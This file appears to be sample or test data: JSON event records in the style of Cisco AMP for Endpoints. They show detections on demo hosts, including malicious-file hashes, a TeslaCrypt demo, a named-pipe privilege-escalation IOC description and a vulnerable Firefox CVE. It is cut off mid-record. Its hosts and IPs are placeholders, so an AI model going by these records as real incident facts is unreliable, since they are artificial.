-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55810,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55805,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55809,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":931000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55808,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":900000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55807,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":869000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55806,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1476910664322001000,"timestamp":1610706778,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:32:58+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706778,"start_date":"2021-01-15T10:32:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Meterpreter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"27:85:29:21:67:49"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.","short_description":"W32.PossibleNamedPipeImpersonation.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/WINDOWS/system32/cmd.exe","identity":{"sha256":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"},"parent":{"disposition":"Clean","identity":{"sha256":"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":25000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671385032556606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900329000200,"timestamp":1610706298,"timestamp_nanoseconds":329000000,"date":"2021-01-15T10:24:58+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706298,"start_date":"2021-01-15T10:24:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":926000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":533000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15212386047828,"timestamp":1610706149,"timestamp_nanoseconds":0,"date":"2021-01-15T10:22:29+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.B1380FD95B-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706149,"start_date":"2021-01-15T10:22:29+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"file:///C%3A/ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967"},"parent":{"disposition":"Clean","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":973000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":951000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":576000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":333000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":170000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605485","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669667045638000,"timestamp":1610706059,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:20:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669667045638188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15210587194928,"timestamp":1610706000,"timestamp_nanoseconds":0,"date":"2021-01-15T10:20:00+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610706000,"start_date":"2021-01-15T10:20:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}},"vulnerabilities":[{"name":"Mozilla Firefox","version":"41.0","cve":"CVE-2015-7204","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204"}]}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":257000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat 